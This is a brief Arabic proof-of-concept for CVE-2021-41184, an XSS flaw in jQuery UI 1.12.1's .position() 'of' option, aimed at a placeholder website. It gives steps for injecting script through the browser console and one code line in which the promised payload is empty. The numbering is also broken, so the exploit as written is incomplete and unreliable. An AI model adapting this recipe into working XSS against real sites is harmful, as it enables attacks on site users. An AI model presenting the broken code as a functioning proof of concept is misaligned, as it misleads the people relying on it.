
إثبات المفهوم لاستغلال CVE-2021-41184، وهي ثغرة برمجة نصية عبر المواقع (XSS) في أداة .position() الخاصة بـ jQuery UI، مستهدفة الإصدار 1.12.1.
استغلال متوسط CVE-2021-41184 XSS في الخيار of من أداة .position()
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
-----------------------------------------------إثبات المفهوم---------------------------------------------------------------
افتح الرابط
افتح أداة الفحص
ابحث عن معرف (ID) في عناصر الموقع
3.1 #ID
انتقل إلى تبويب الكونسول
احقن النص البرمجي باستخدام المعرف المحدد في النقطة 3.1
5.1 النص البرمجي
$("#id").position( {
my: "center", at: "right bottom", of: "", collision: "none" });